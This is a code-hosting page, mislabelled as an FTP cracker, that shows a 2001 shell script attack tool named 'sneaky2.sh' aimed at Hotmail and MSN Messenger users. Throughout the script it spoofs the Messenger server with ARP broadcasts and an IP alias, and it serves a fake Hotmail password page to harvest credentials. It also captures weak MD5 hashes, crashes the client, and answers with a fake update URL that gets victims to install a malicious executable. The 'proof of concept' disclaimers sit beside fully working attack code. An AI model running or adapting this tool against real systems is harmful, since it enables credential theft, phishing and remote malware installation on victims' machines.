📄 sneaky2.sh

📁 一个FTP密码破解程序的源代码
💻 SH
字号:
#!/bin/sh##          //#         // neaky.sh #         \\#          \\ wiss army knife for Hotmail/Messenger#          // #         //### "Spoofing/brute force/misconception/unexpected input Class Attack"## ## AUTHOR: Gregory Duchemin ( Aka c3rb3r )## COMPANY: NEUROCOM CANADA#           1001 bd Maisonneuve Ouest, suite 200#           H3A 3C8 Montreal (Quebec) CANADA#           gdn@neurocom.com#           514 908 6800#           http://www.securite-internet.com## DATE: January 2001## PURPOSE: Will spoof Hotmail/messenger server to recover user # hotmail/password, crash messenger client, remotely inject and # execute malicious exe on the victim host.## NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY # to the limited broadcast address/IP Broadcast   # otherwise u can still try it on your own gateway or from your provider ;)# As a last resort, u can temporalily modify your DNS entry for # messenger servers.## REQUIRED: This sploit needs an "arptool" like software and a local www server to work properly.#          =================================================================############################################################################################ THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY ########################################################################################### export delay=100000#################################### Things to be configured first#################################### IP address of messenger server to spoof# It change from client to client, check it by sniffing or u can always # assign as many virtual ip as there are messenger server IP. export messenger="64.4.13.56"# HTTP document rootexport cgiroot="/usr/local/apache/cgi-bin/"export httproot="/usr/local/apache/htdocs/"# Malicious exe locationexport malicious_path="/tmp/"export malicious="mmssetup.exe"# Access URI : stupid garbage to hide the real urlexport relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother"# Messenger PORTexport PORT=1863# real IP of our fake hotmail server, this host ipexport MYIP="192.168.10.17"# number of non read messages,# need at least 1 to stimulate requests from the client export nrmsg="10"#number of non read folders  export nrfld="0"#path/filename where to store hotmail passwordexport PASSWORD_HERE="/tmp/hotmail-pass"#path to reach your arp spoofer/flooderexport ARP="arptool"########################################### End of configuration options##########################################handl3r(){echoecho "Job finished, hope everything is ok...."echo "see ./log for details."echohtml_cleanersynckillall "$ARP"exit}usage(){echoecho -e "Usage: $0 [MODE] \n"echoecho "MODE:   1 /  Hotmail web spoof for clear password recovery."echo "        2 /  Hotmail weakenned MD5 password Hash recovery for bruteforce."echo "        3 /  Messenger Remote CrAsh."echo "        4 /  Remote injection of malicious exe."echoechoecho "NOTE: Don't forget to customize settings in the script (the first lines)."echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel."echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !"echoecho "DETAILS: attack 1/ will trojanize victim to get back a plain password."echo "         attack 2/ will ask for weak md5 hash."echo "         attack 3/ will crash the client.(exploitable b.overflow ?)"echo "         attack 4/ will upload a fake update, naively installed."echoecho "have a nice day"echo "                   Gregory Duchemin ( c3rb3r@hotmail.com )"echo echo} if [ $# -lt 1 ]; thenusageexitfiexport MODE="$1"if [ $MODE -gt 4 ]; thenusageexitfi# IP_forwarding should be set to avoid detection/suspicion.sysctl -w net.ipv4.conf.all.forwarding=1if [ $? -eq 1 ]; thenusageechoechoecho "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script."echoechofi# automatic configuration of arp broadcasting/spoofing over the Lan.echoecho -n "ARP broadcast : "$ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2  2>&1 > /dev/null &if [ $? -eq 1 ]; thenusageechoechoecho "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script."echoechoexitfiecho "OK"export TID=$!if [ $MODE = "2" ]; thenechoecho "Weak MD5 hashes will be stored in /tmp/md5-password"echoecho fiif [ $MODE = "1" ]; then echoecho "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password"echoechofiif [ $MODE = "3" ]; then echoecho "Remote client may suddenly die...."echoechofiif [ $MODE = "4" ]; thenif [ ! -f $malicious_path"/$malicious" ]; thenechoecho "Please first define the trojan (in the configuration section)"echoechoexit 0fiechoecho "Remote Injection of junky data."echoechofitrap handl3r SIGINTfunction html_builder(){echo -n -e "#!/bin/sh\ncat << __MYGIFT__Content-type:text/html\n<html><!--JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES--><body><div align=left><div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\"><div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\"> <form name=\"passwordform\"  action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF ><table cellpadding=0 cellspacing=0 border=0 width=590><tr><td colspan=2><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td><a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a></td><td align=CENTER nowrap><img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br><a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br></td></tr></table></td></tr><tr><td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td><td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td></tr><tr><td height=6></td></tr><tr valign=top><td><font class=s></font></td><td rowspan=4><font class=s></font></font></td></tr><tr><td><font class=f size=2><b>&lt;" > $cgiroot"/$relogin"cat /tmp/.mail >> $cgiroot"/$relogin"echo -n -e "&gt;</b></font><input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com><table cellpadding=0 cellspacing=0><tr><td height=35 valign=middle><font class=sbd>Password</font>&nbsp;</td><td><input type=password name=PASSWORD size=16 maxlength=16></td><td width=22 valign=\"middle\" align=\"center\">&nbsp;</td><td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td></tr><tr><td></td><td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">ChangeUser</a></b></font></td></tr></table></form></table><table cellpadding=0 cellspacing=0 border=0 width=590><tr><td>&nbsp;  C3rb3r &copy; 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept. <a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a> &nbsp; <a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement</font></a></td></tr></table></div><p align=center><img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 ></div></div></body></html> \n__MYGIFT__\n\n">> $cgiroot"/$relogin"chmod a+x $cgiroot"/$relogin"#echo "This is the false update for messenger."  > $httproot"mmssetup.exe"echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html"}html_cleaner(){rm -f $cgiroot"/$relogin"mkdir -p $httproot"$relogin"chmod a+rwx $httproot"$relogin"cp -f $malicious  $httproot"$relogin""/mmssetup.exe"rm -f $httproot"response.html"}#IP ALIAS with messenger IPechoecho -n "Interface configuration : "ifconfig eth0:0 inet $messengerecho "OK"echoecho "Waiting for a client n0w...."echo# things are getting serious now, this is the messenger automate:export flag="0"cat /dev/null > ./tracewhile truedosync(usleep  $delay while truedoexport parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)"if [ "$parsed" != "" ]; thensyncexport request=$(echo $parsed | awk '{print $1}')export num=$(echo $parsed | awk '{print $2}')case "$request" inVER)usleep $delay cat ./log | sed -e "s/VER/ver/" > ./logecho -e "VER $num MSNP5 MSNP4 CVR0\r" syncusleep $delay ;;INF)cat ./log | sed -e "s/INF/inf/" > ./logexport new=$(echo $num | sed -e 's/.$/ /')echo -e "INF $new""MD5\r" usleep $delay ;;USR)      cat ./log | sed -e "s/USR/usr/" > ./logexport ttype=$(echo $parsed | awk '{print $4}')if [ "$ttype" = "I" ]; thenexport email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')echo "$email" > /tmp/.mailhtml_builderrm -f /tmp/.mailif [  ! $MODE = "2" ]; thenecho -e "USR $num MD5 S "$(date "+%s")"\r"elseecho -e "USR $num MD5 S \r"fielseexport password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')if [ $MODE = "2" ]; thenecho -e "910 $num \r" usleep $delay echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-passwordsyncexit fiecho -e "USR $num OK $email $email\r" fiusleep $delay;;SYN)export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}')cat ./log | sed -e "s/SYN/syn/" > ./logexport time=$(date "+%s") echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\n: 1.0\r\nContent-Type: text/x-msmsgspro\file; charset=UTF-8\r\nLoginTime: $time\\r\nEmailEnabled: 1\r\nMemberIdHigh: 84\224\r\nMemberIdLow: 1114357868\r\nlang_pre\ference: 1033\r\npreferredEmail: \r\ncount\ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\ 60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \2AAAAAAA\AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\t3erLcBGzQ$$\r\n\r"usleep $delay echo -e "SYN $num $syn\r"usleep $delay sync ;;CVR)export version=$(echo $parsed | awk '{print $8}')cat ./log | sed -e "s/CVR/cvr/" > ./log      if [ "$flag" = "0" ]; thenif [ $MODE = "4" ]; thenecho -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ttp://$MYIP\/$relogin""/$malicious http://$MYIP/$relogin""/$malicious\\r"else      echo -e "CVR $num $version $version 1.0.0863 h\ttp://$MYIP/\/mmssetup.exe http://$MYIP\/\r"      fiexport flag="1"else if [ "$flag" = "1" ]; thenecho -e "$chg"echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\n: 1.0\r\nContent-Type: text/x-msmsgsini\tialemailnotification; charset=UTF-8\r\n\\r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\\r\nInbox-URL: /$relogin""\r\nFolders\-URL: /$relogin""\r\nGet-URL: http\//$MYIP\r\n\r"if [ $MODE = "4" ]; thenecho -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ttp://$MYIP/\mmssetup.exe http://$MYIP/\r"elseecho -e "CVR $num $version $version 1.0.0863 h\ttp://download.microsoft.com/download/\msnmessenger/Patch/2.1/Win98/EN-US/msg\strst.dll http://messenger.msn.com/\r"fiexport flag="3"echo -e "BPR $num C3rb3r@hotmail.com PHH\r"echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\ c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\otmail.com MOB N\r"usleep $delayif [ $MODE = "3" ]; thenecho -e  "ADD 0 AL Crash Crash \r"usleep $delayexit 0fififiusleep $delay ;;CHG)export chg=$( echo "$parsed"| egrep "CHG")cat ./log | sed -e "s/CHG/chg/" > ./logusleep $delay ;;OUT)html_cleanerexit 0;;URL)cat ./log | sed -e "s/URL/url/" > ./logecho -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\\r"usleep $delay ;;esac fidone)| nc -w 5 -s $messenger  -n -l -p $PORT > ./log 2>/dev/null  egrep -e 'OUT' ./log > /dev/nullif [ ! $? -eq 1 ]; thenechoecho "Victim has signed out...."echo "see ./log for details."echofidone
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -